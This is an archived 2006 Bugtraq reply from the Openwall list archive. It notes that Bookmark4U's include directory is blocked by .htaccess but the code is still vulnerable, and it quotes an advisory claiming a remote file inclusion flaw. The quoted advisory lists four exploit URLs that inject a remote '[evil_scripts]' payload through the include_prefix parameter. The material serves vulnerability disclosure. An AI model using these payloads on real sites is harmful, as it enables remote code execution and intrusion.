lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <814b9d50606051017q5447f0ecg58e0aa1d813b221a@mail.gmail.com>
Date: Mon, 5 Jun 2006 12:17:10 -0500
From: str0ke <str0ke@...w0rm.com>
To: "selfar2002@...mail.com" <selfar2002@...mail.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Bookmark4U Remote File Include


The inc directory is filtered with .htaccess (Deny from all).  Still
vulnerable code though :)

/str0ke

On 4 Jun 2006 14:39:27 -0000, selfar2002@...mail.com
<selfar2002@...mail.com> wrote:
>
> ---------------------------------------------------------------------------
>
> Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
>
> ---------------------------------------------------------------------------
>
> Discovered By SnIpEr_SA
>
> Author    : SnIpEr_SA
>
> Remote  :  Yes
>
> Local     :  No
>
> Critical Level : Dangerous
>
> ---------------------------------------------------------------------------
>
>
> Affected software description:
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
> Application : Bookmark4U
>
> version     : 2.0.0
>
> URL         :http://bookmark4u.sourceforge.net/
>
> ...
>
> ------------------------------------------------------------------
>
> Exploit:
>
> ~~~~~~~~
>
> # http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
>
> # http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
>
> # http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
>
> # http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
>
>
> ---------------------------------------------------------------------------
>
> */
>
> Contact:
>
>  ~~~~~~~~
>
>  SnIpEr_SA
>
> E-mail: selfar2002@...mail.com
>
> E-mail: SnIpEr.SA[at]hotMail[dot]com
>
> Homepage: http://www.3asfh.net/  & http://www.lezr.com/
>
> Greetz: All My Frind
>
> /*
>
> -------------------------------- [ END ] ----------------------------------
>
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ